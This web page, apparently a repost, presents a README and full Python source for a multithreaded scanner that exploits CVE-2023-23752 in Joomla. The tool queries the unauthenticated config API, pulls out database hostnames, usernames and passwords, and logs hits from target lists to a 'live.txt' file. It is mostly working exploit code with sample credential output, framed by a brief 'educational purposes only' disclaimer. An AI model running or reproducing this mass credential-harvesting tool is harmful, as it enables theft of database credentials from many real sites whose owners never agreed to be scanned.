Joomla Authentication Bypass Vulnerability Scanner (CVE-2023-23752) - Single & Massive Scan
Joomla Authentication Bypass Vulnerability Scanner (CVE-2023-23752)
This script utilizes CVE-2023-23752 to scan single or multiple Joomla instances for authentication bypass vulnerabilities and potential information leaks, including database credentials. It provides options for both single URL and massive scanning with multithreading.
Features:
- CVE-2023-23752 Exploitation: Exploits the authentication bypass vulnerability for potential database credential extraction.
- Single URL Scanning: Allows scanning of a single Joomla instance.
- Massive Scanning: Utilizes multithreading for efficient scanning of multiple Joomla instances listed in a file.
- Results Storage: Saves results in separate files for each scanned URL and a consolidated 'live.txt' file for successful hits.
- User-Friendly Interface: Provides a clear and interactive user interface for ease of use.
Prerequisites:
- Python 3.x
requestslibrary:pip install requestscoloramalibrary:pip install coloramaurllib3library:pip install urllib3
Usage:
- Install Dependencies: Install the required libraries using
pip install requests colorama urllib3. - Run the script: Execute the script using
python cve-2023-23752-scanner.py. - Select Scan Mode: Choose either 'Single Scan' (for a single URL) or 'Massive Scan' (for multiple URLs).
- Provide Input: If using single scan, enter the target URL. If using massive scan, provide the path to a file containing a list of URLs.
Example (Single Scan):
python cve-2023-23752-scanner.py
[1] - Single Scan
[2] - Massive Scan
[CVE-2023-23752]: 1
IP/Domain: https://example.com
[CVE-2023-23752] - https://example.com .: [Scanning!]
[+] Domain : https://example.com
[+] Database Type : mysql
[+] Database Prefix : jos_
[+] Database : example_com_db
[+] Hostname : localhost
[+] Username : example_user
[+] Password : example_password
Example (Massive Scan):
python cve-2023-23752-scanner.py
[1] - Single Scan
[2] - Massive Scan
[CVE-2023-23752]: 2
[+] IP/DOMAIN List: targets.txt
[CVE-2023-23752] - https://target1.com .: [Scanning!]
[CVE-2023-23752] - https://target2.com .: [Scanning!]
[CVE-2023-23752] - https://target3.com .: [Scanning!]
[+] Domain : https://target1.com
[+] Database Type : mysql
[+] Database Prefix : jos_
[+] Database : target1_db
[+] Hostname : localhost
[+] Username : target1_user
[+] Password : target1_password
[CVE-2023-23752] - https://target2.com .: [No Sensitive Information!]
[CVE-2023-23752] - https://target3.com .: [Error!]
Disclaimer:
This script is for educational and research purposes only. Use it responsibly and ethically. Do not use it for illegal activities or against systems you are not authorized to scan.
# Updated Multithreading with default thread count of 10
# Author: Pari Malam
import requests, sys, os, re, colorama, urllib3
from sys import stdout
from colorama import Fore, Style, Back, init
from concurrent.futures import ThreadPoolExecutor, as_completed
init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if not os.path.exists('Results'):
os.mkdir('Results')
def banners():
os.system('clear' if os.name == 'posix' else 'cls')
print(f'{Fore.YELLOW}[CVE-2023-23752] - {Fore.GREEN}Authentication Bypass Information Leak on Joomla!')
banners()
def scan_single_url(url=None):
if url is None:
url = input(f'\n{Fore.YELLOW}IP/Domain: {Fore.RESET}')
if not url.startswith('https://') and not url.startswith('http://'):
full_url = 'http://' + url
else:
full_url = url
print(f'\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]')
try:
headers = {
'Host': url,
'content-type': 'application/vnd.api+json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
}
response = requests.get(full_url, headers=headers, verify=False, timeout=10)
config_url = full_url + '/api/index.php/v1/config/application?public=true' #/api/index.php/v1/users?public=true
config_response = requests.get(config_url, verify=False)
if config_response.status_code == 200 and b'dbtype' in config_response.content:
decoded_content = config_response.content.decode()
if 'dbtype' in decoded_content:
dbtype = re.findall(''dbtype':'(.*?)'', decoded_content)[0]
dbprefix = re.findall(''dbprefix':'(.*?)'', decoded_content)[0]
host = re.findall(''host':'(.*?)'', decoded_content)[0]
db = re.findall(''db':'(.*?)'', decoded_content)[0]
user = re.findall(''user':'(.*?)'', decoded_content)[0]
password = re.findall(''password':'(.*?)'', decoded_content)[0]
print(f'{Fore.YELLOW}\n[+] Domain : {Fore.GREEN}{url}')
print(f'{Fore.YELLOW}[+] Database Type : {Fore.GREEN}{dbtype}')
print(f'{Fore.YELLOW}[+] Database Prefix : {Fore.GREEN}{dbprefix}')
print(f'{Fore.YELLOW}[+] Database : {Fore.GREEN}{db}')
print(f'{Fore.YELLOW}[+] Hostname : {Fore.GREEN}{host}')
print(f'{Fore.YELLOW}[+] Username : {Fore.GREEN}{user}')
print(f'{Fore.YELLOW}[+] Password : {Fore.GREEN}{password}\n')
if host != 'localhost' and host != '127.0.0.1':
with open('Results/live.txt', 'a') as f:
f.write(f'[+] {url}\nDatabase Type : {dbtype}\nDatabase Prefix : {dbprefix}\nHostname : {host}\nDatabase : {db}\nUsername : {user}\nPassword : {password}\n\n')
return decoded_content, True
except Exception as e:
print(f'{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Failed!]')
return '', False
def scan_multiple_urls(thread_count=10):
url_list = input(f'\n{Fore.RED}[+] {Fore.YELLOW}IP/DOMAIN List: {Fore.RESET}')
urls = []
if not os.path.exists('Results'):
os.makedirs('Results')
with open(url_list, 'r') as f:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = []
for url in f:
url = url.strip()
if not url.startswith('https://') and not url.startswith('http://'):
url = 'http://' + url
if re.match(r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', url):
url_file_name = f'Results/IPs_{url}.txt'
else:
url_file_name = re.sub(r'https?://', '', url).rstrip('/') + '.txt'
url_file_path = f'Results/{url_file_name}'
futures.append(executor.submit(scan_single_url, url.strip()))
urls.append(url)
for future in as_completed(futures):
response, sensitive_matches = future.result()
if sensitive_matches:
decoded_content = response
dbtype = re.findall(''dbtype':'(.*?)'', decoded_content)[0]
dbprefix = re.findall(''dbprefix':'(.*?)'', decoded_content)[0]
host = re.findall(''host':'(.*?)'', decoded_content)[0]
db = re.findall(''db':'(.*?)'', decoded_content)[0]
user = re.findall(''user':'(.*?)'', decoded_content)[0]
password = re.findall(''password':'(.*?)'', decoded_content)[0]
if host != 'localhost' and host != '127.0.0.1':
with open('Results/live.txt', 'a') as f:
f.write(f'[+] {url}\nDatabase Type : {dbtype}\nDatabase Prefix : {dbprefix}\nHostname : {host}\nDatabase : {db}\nUsername : {user}\nPassword : {password}\n\n')
with open(url_file_path, 'w', encoding='utf-8') as f:
f.write(decoded_content)
elif response:
print(f'{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]')
else:
print(f'{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Error!]')
return urls
if __name__ == '__main__':
choice = input(f'\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}')
if choice == '1':
response, sensitive_matches = scan_single_url()
elif choice == '2':
thread_count = input(f'\n{Fore.YELLOW}[+] Thread Count (Default is 10): {Fore.RESET}')
if thread_count.isdigit():
thread_count = int(thread_count)
else:
thread_count = 10
scan_multiple_urls(thread_count)
else:
print(f'\n{Fore.RED}Invalid option selected')
原文地址: https://www.cveoy.top/t/topic/oWT8 著作权归作者所有。请勿转载和采集!